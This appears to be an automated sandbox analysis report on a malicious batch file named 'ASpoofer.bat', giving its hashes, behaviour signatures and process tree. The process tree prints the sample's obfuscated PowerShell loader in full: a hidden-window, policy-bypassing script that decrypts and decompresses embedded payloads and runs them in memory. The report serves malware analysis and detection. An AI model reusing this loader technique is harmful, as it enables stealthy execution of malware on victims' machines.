Analysis
-
max time kernel
120s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
25-01-2025 20:18
Static task
static1
Behavioral task
behavioral1
Sample
ASpoofer.bat
Resource
win7-20241010-en
5 signatures
150 seconds
General
-
Target
ASpoofer.bat
-
Size
412KB
-
MD5
b4072c48624667e139963c777247f52c
-
SHA1
d5f1a4d22c85458253d4572f9ab89b2a20f31a9c
-
SHA256
410e2db30b4e8a57933ee02c30a1dbbefd1d5572ce30153c0a4db927123df67b
-
SHA512
d080e2dfd3189c45cf56dc9e7483c4a7302a204abcb2d17cce93c4c814366ea4cbd44b98e0d887dcfafb7eaef6156b1813eee360201df3ff1e20ad0b34f10867
-
SSDEEP
12288:oAnKKFTbWZb6pfT0ctJ0CM+8GmsGaFltmFy3:oA5bWZ2dn0C/7iY
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2784 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2784 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2908 wrote to memory of 2792 2908 cmd.exe 31 PID 2908 wrote to memory of 2792 2908 cmd.exe 31 PID 2908 wrote to memory of 2792 2908 cmd.exe 31 PID 2792 wrote to memory of 2224 2792 net.exe 32 PID 2792 wrote to memory of 2224 2792 net.exe 32 PID 2792 wrote to memory of 2224 2792 net.exe 32 PID 2908 wrote to memory of 2784 2908 cmd.exe 33 PID 2908 wrote to memory of 2784 2908 cmd.exe 33 PID 2908 wrote to memory of 2784 2908 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ASpoofer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2224
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4QckMW/d0RHFEz78g/IF+wxPuEC8wYXsS9DpIlDAv2s='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('83AsJ46ibSIDFQYQt7U5Lg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $csNtZ=New-Object System.IO.MemoryStream(,$param_var); $fVZlA=New-Object System.IO.MemoryStream; $BjErP=New-Object System.IO.Compression.GZipStream($csNtZ, [IO.Compression.CompressionMode]::Decompress); $BjErP.CopyTo($fVZlA); $BjErP.Dispose(); $csNtZ.Dispose(); $fVZlA.Dispose(); $fVZlA.ToArray();}function execute_function($param_var,$param2_var){ $PtQUF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xBHIV=$PtQUF.EntryPoint; $xBHIV.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ASpoofer.bat';$NjhJG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ASpoofer.bat').Split([Environment]::NewLine);foreach ($PiPhj in $NjhJG) { if ($PiPhj.StartsWith(':: ')) { $IMbBZ=$PiPhj.Substring(3); break; }}$payloads_var=[string[]]$IMbBZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-